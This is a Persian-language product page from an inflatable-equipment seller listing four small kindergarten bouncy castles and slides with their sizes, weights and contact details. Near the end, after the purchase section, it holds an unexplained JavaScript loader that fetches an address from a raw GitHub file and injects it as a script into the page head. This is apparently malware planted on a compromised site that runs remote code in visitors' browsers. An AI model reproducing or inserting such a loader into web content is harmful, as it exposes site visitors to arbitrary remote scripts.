قصر بادی مهدکودکی که در خانه می توانید استفاده کنید
قصر بادی مهدکودکی که در خانه می توانید استفاده کنید

قصر بادی مهدکودکی که در خانه می توانید استفاده کنید

  • قصر بادی مهدکودکی می توان در خانه استفاده کرد؟ ما در اینجا چند تا از قصر بادی مهدکودکی که در خانه می توانید استفاده کنید به شما معرفی می کنیم.

    قصر بادی مهدکودکی

    سرسره بادی مهد کودکی عموما به سرسره بادی هایی گفته می شود که از ارتفاع پایین تر از سرسره های دیگر بر خوردار است. همچنین این سرسره بادی ها فضای کمتری را در بر می گیرند. این محصولات برای سنین پایین تر و کودکان استفاده می شود و برای سنین بالاتر مناسب نیست. قیمت این قصر بادی ها نسبتا پایین تر از قیمت قصر بادی های دیگر می باشد.

    1. سرسره بادی مک کوئین KM-142

    سرسره بادی مک کوئین دارای طرح انیمیشن ماشینی مک کوئین است. طول این قصر بادی به ۴ متر می رسد. همچنین دارای عرض ۳ متر و ارتفاع ۲.۵ متر می باشد. وزن این سرسره بادی ۵۰ کیلوگرم و بسیار سبک می باشد.

    2. سرسره بادی مهد کودکی باب اسفنجی KM-143

    این سرسره دارای طرح ثابت باب اسفنجی است. ابعاد این سرسره به شرح، طول 4 متر، عرض 3 متر و ارتفاع 2.5 متر می باشد. این سرسره مشابه سرسره مک کوئین با چاپ و طرح کمی متفاوت تر است. همچنین وزن این سرسره 50 کیلوگرم می باشد.

    3. قصر بادی مهدکودکی حلزونی KM-152

    این سرسره نسبتا از دو سرسره معرفی شده بزرگتر است. سرسره حلزونی به طول ۴ متر، عرض ۳.۵ متر و همچنین ارتفاع ۲.۸ متر قرار دارد. وزن سرسره به ۶۰ کیلوگرم می رسد. چاپ و طرح این سرسره ثابت و رنگبندی آن متغییر با پارچه موجود می باشد.

    4. سرسره بادی مهد کودکی تام و جری KM-190

    این سرسره دارای طرح ثابت تام و جری است. سرسره تام و جری به طول ۴ متر، عرض ۳ متر و همچنین ارتفاع 2.5 متر قرار دارد. وزن سرسره به 50 کیلوگرم می رسد. چاپ و طرح این سرسره ثابت و رنگبندی آن متغییر با پارچه موجود می باشد.

    نحوه خرید قصر بادی مهدکودکی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید سرسره بادی مهد کودکی به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید